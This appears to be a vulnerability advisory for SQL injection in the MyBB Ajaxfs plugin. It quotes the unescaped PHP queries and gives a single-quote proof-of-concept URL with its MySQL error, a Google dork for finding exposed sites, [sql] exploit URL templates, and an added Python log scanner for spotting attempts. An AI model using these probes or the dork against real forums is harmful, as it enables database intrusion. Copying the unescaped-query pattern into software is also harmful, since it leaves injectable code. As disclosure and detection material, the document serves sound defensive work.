MyBB Ajaxfs SQL Injection

########################################################
# Exploit Title  : MyBB Ajaxfs Plugin SQL Injection vulnerability
# Author         : Iranian Exploit DataBase
# Discovered By  : IeDb
# Software Link  : http://mods.mybb.com/download/ajax-forum-stat-v-2
# Security Risk  : High
# Tested on      : Linux
# Dork           : inurl:ajaxfs.php
########################################################

1) ajaxfs.php, post tooltip: the pid taken from the URL is concatenated into the SQL string without escaping or an integer cast
if(isset($_GET['tooltip']))
{
    $pid=$_GET['tooltip'];
    // $pid is attacker-controlled; a single quote closes the string literal and the rest becomes SQL
    $query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
    // ... remainder of the handler omitted in the advisory
}

2) ajaxfs.php, user tooltip: the same pattern with the uid
if(isset($_GET['usertooltip']))
{
    $uid=$_GET['usertooltip'];
    // same flaw: raw GET value interpolated into the query
    $query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
    // ... remainder of the handler omitted in the advisory
}

Proof of concept: a single quote in the parameter breaks the quoted literal and MySQL returns a syntax error, confirming the value reaches the query unescaped.

http://localhost/Upload/ajaxfs.php?usertooltip=1'

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
right syntax to use near ''''' at line 1
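As an added defender-side example (not part of the original advisory), the Python below encodes the contract the plugin should have enforced, namely that tooltip and usertooltip are MyBB integer pid/uid values, and applies it to constructed access-log lines to flag requests that violate it. The log format, client IPs and paths are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the vulnerable ajaxfs.php handlers interpolate into SQL.
VULN_PARAMS = ("tooltip", "usertooltip")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2014:10:01:02 +0000] "GET /forum/ajaxfs.php?tooltip=13349 HTTP/1.1" 200 512
10.0.0.7 - - [12/Mar/2014:10:01:09 +0000] "GET /forum/ajaxfs.php?tooltip=13349' HTTP/1.1" 200 1207
10.0.0.7 - - [12/Mar/2014:10:01:15 +0000] "GET /forum/ajaxfs.php?usertooltip=1%27 HTTP/1.1" 200 1207
10.0.0.9 - - [12/Mar/2014:10:02:00 +0000] "GET /forum/index.php HTTP/1.1" 200 8800
"""

def sanitize_id(raw: str):
    """Defensive equivalent of what the plugin should do before querying:
    accept only a plain ASCII non-negative integer (a pid/uid), else None."""
    return int(raw) if re.fullmatch(r"[0-9]+", raw) else None

def suspicious_params(url: str) -> dict:
    """Return {param: decoded value} for tooltip/usertooltip values
    that do not satisfy the integer contract."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    bad = {}
    for name in VULN_PARAMS:
        for value in qs.get(name, []):
            if sanitize_id(value) is None:
                bad[name] = value
    return bad

def scan_log(text: str) -> list:
    """Return (line_no, client_ip, offending_params) for each request to
    ajaxfs.php whose tooltip/usertooltip value is not a bare integer."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = m.group(1)
        if not urlsplit(url).path.endswith("/ajaxfs.php"):
            continue
        bad = suspicious_params(url)
        if bad:
            hits.append((n, line.split(" ", 1)[0], bad))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same integer check applied server-side (casting the parameter to int before it reaches the query) removes the injection; the log scan is for spotting exploitation attempts on forums where the plugin is still unpatched.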

Google DORK : inurl:ajaxfs.php

# Exploit :
# http://site.com/mybb/ajaxfs.php?tooltip=[sql]
# http://site.com/mybb/ajaxfs.php?usertooltip=[sql]


#################################

# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers

#################################

# Exploit Archive = http://www.iedb.ir/exploits-889.html

#################################
